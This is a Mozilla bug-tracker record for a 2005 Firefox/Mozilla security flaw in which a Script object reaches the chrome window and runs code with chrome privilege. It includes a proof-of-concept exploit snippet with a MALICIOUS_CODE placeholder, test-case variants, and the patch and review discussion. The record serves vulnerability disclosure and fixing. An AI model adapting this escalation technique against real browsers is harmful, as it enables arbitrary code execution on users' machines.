Closed Bug 290908 Opened 19 years ago Closed 19 years ago

new Script() can access chrome window and run arbitrary code with chrome privilege

Categories

(Core :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking


RESOLVED FIXED

People

(Reporter: moz_bug_r_a4, Assigned: brendan)

References

Details

(Keywords: fixed-aviary1.0.4, fixed1.7.8, Whiteboard: [sg:fix] trunk version rolled into 281988)

Attachments

(4 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access a non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access a non-DOM JS property (related to Bug 290324).

There is a way to circumvent the fix presented in bug 289074 comment 79. The
code in the Script object can access |arguments.callee.__parent__|, which is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

Note:
It matters how the Script object is created. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
Attached file testcase 1
for Firefox/1.0.3
Attached file testcase 2
for Mozilla/1.7.7
Attached file testcase 3
each of the ways to create Script object
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Status: NEW → ASSIGNED
Blocks: sbb?
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
The more JS can interact with chrome, the more exploits.

Especially if chrome executes JS.
Attached patch fix
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
Comment on attachment 181234
fix

jst, feel free to review too.

/be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment on attachment 181234
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
Comment on attachment 181234
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
Checked into branches.

/be
Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
Other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? Thanks!
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

was D) supposed to be fixed?
Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8
Group: security
Blocks: sbb+
No longer blocks: sbb?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?